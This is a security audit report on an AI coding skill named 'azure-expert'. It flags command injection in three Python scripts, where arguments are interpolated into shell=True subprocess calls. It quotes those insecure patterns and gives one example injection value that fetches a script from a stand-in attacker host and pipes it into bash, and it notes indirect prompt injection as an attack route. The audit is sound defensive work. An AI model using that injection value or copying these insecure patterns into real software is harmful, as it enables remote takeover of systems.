Skills
NYC
skills/questfortech-investments/claude-code-skills/azure-expert/Gen Agent Trust Hub

azure-expert

Fail

Audited by Gen Agent Trust Hub on Feb 17, 2026

Risk Level: HIGHCOMMAND_EXECUTION
Full Analysis
  • [COMMAND_EXECUTION] (HIGH): Multiple scripts utilize unsafe shell execution patterns that are vulnerable to command injection.
  • Evidence in scripts/cost_analyzer.py: The resource_group argument from argparse is interpolated into a command string: cmd += f" --resource-group {resource_group}" and then executed via subprocess.run(f"az {cmd}", shell=True).
  • Evidence in scripts/deploy_webapp.py: The script constructs deployment commands using f-strings, such as run_command(f"az group create --name {resource_group} --location {location}"). Because shell=True is used in the run_command helper, shell metacharacters in the arguments will be interpreted.
  • Evidence in scripts/resource_status.py: Functions like check_webapp_status pass the name and resource_group arguments directly into shell commands: run_az_command(f"webapp show --name {name} --resource-group {resource_group}").
  • Risk: A malicious user or an indirect prompt injection attack could provide an argument like "my-rg; curl http://attacker.com/shell.sh | bash" to gain full control of the execution environment.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Feb 17, 2026, 05:34 PM